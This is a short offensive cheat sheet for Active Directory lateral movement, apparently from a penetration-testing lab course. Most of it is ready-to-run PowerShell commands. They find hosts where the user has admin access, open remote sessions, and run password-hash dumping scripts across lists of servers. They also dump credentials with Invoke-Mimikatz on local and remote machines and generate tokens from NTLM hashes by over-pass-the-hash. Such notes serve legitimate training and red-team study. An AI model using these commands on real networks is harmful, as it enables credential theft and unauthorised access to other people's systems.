Lateral Movement
PowerView
..\PowerView
#Find where you have local admin access
Find-LocalAdminAccess
#Start a PowerShell session on the server
Enter-PSSession -ComputerName <FQDN OF SERVER WITH ADMIN ACCESS>
whoami
whoami /priv
hostname
#Use different credentials:
Enter-PSSession -Credential <username> <password> -ComputerName <FQDN OF SERVER WITH ADMIN ACCESS>
#Create a stateful session
$sess = Enter-PSSession -ComputerName <FQDN OF SERVER WITH ADMIN ACCESS>
#see the session
$sess
#Enter the session
Enter-PSSession -Session $sess
#Exit the session
exit
Executing Commands Remotely
#Execute a command on a remote target with local admin access
Invoke-Command -ComputerName <FQDN OF SERVER WITH ADMIN ACCESS> -ScriptBlock{whoami;hostname}
Invoke-Command -ComputerName <FQDN OF SERVER WITH ADMIN ACCESS> -ScriptBlock{Get-Process}
#Execute scripts from files
Invoke-Command –FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
#Use below to execute locally loaded function on the remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)
#In this case, we are passing arguments. Keep in mind that only positional arguments can be passed this way:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList
#Use below to execute "stateful" commands using Invoke-Command:
$Sess = New-PSSession –Computername Server1
Invoke-Command –Session $Sess –ScriptBlock {$Proc = Get-Process}
Invoke-Command –Session $Sess –ScriptBlock {$Proc.Name}
Invoke-Mimikatz
#Dump credentials on a local machine.
Invoke-Mimikatz -DumpCreds
#Dump credentials on multiple remote machines.
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
#Invoke-Mimikatz uses the PowerShell remoting cmdlet Invoke-Command to do the above.
#Over-pass-the-hash: generate tokens from hashes.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"